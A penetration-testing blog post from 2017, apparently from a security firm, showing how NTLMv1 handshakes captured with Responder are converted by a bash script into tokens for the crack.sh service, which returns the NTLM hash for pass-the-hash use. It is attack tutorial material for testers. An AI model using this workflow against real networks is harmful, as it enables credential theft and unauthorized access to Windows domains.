February 1, 2017

Cracking NTLMv1 Handshakes with Crack.sh

What

This post will show how to crack NTLMv1 handshakes with the crack. Sh. service to obtain the NTLM hash. This technique has been publicized since 2013, but is often not leveraged by testers.

Intro

For most pentesters, running Responder.py is one of the first tasks performed on internal penetration tests. This tool will spoof Multicast name resolution queries and give the pentester NTLMv1 and NTLMv2 handshakes. The next step usually is to then attempt to crack those handshakes, usually at a minimum running them against a wordlist such as crackstation.

A NTLMv1 handshake, however, offers another usually ignored cracking option that is guaranteed to give the tester the NTLM hash. Unlike the NTLMv1 handshake, the NTLM hash can be used as a password equivalent in a windows environment.

Required Reading

MS-CHAPv2 handshakes can be broken into two rounds of 56 bit DES (and a third round using only 2bytes of the keyspace), which Moxie Demonstrated could be cracked by modern FPGAS

(https://www.youtube.com/watch?v=sIidzPntdCM).

NTLMv1 handshakes are essentially MS-CHAPv2 handshakes, making them susceptible to the same weakness (https://markgamache.blogspot.ru/2013/01/ntlm-challenge-response-is-100-broken.html).

How do we exploit this?

You can use the crack.sh site to extract the NTLM hash from any MSCHAP or NTLMv1 handshake for 20 bucks. The site doesn’t take the challenge/response displayed in Responder directly, instead you need to convert it to a token.

The script below can be used to convert the Responder output to a token that will be accepted by crack.sh.

#!/bin/bash

if [ $# -lt 1 ]
then
    echo "Usage: ntlm-chapcrack.sh <hash_file> <hash_file2> ..."
    exit 1
fi

for i in $@; do 
for hash in $( cat $i )
do
    user=$(echo $hash | cut -f1 -d:)
    domain=$(echo $hash | cut -f3 -d:)
    lmresp=$(echo $hash | cut -f4 -d:)
    ntresp=$(echo $hash | cut -f5 -d:)
    srvchallenge=$(echo $hash | cut -f6 -d:)
    
    # Secret sauce: https://lists.samba.org/archive/samba-technical/2003-July/030974.html
    if [ ${lmresp:16:32} ==  "00000000000000000000000000000000" ]
    then
        
        clientchallenge=${lmresp:0:16}
        combinedchallenge=$srvchallenge$clientchallenge

        srvchallenge=$( echo $combinedchallenge | xxd -r -p| md5sum -b | cut -c1-16)
    fi

     echo 
     echo "user:$user" 
     echo "domain:$domain"
     echo "lmresponse:$lmresp" 
     echo "ntresp:$ntresp" 
     echo "challenge:$srvchallenge"
    
     chapcrack=$(locate chapcrack.py | head -1)
     if [ -e "$chapcrack" ]
     then
         $chapcrack radius -R $ntresp -C $srvchallenge
     else
        echo "chapcrack.py radius -R $ntresp -C $srvchallenge"
    fi 
done
done

Upload this token to crack.sh, give them 20 bucks, and wait for your NTLM hash.

Another Hash?

Yep, NTLM hashes are password equivalents in a Windows environment. Use a tool like wmi-pth to leverage your newly acquired NTLM hash.

Discover additional Tevora Threat Resources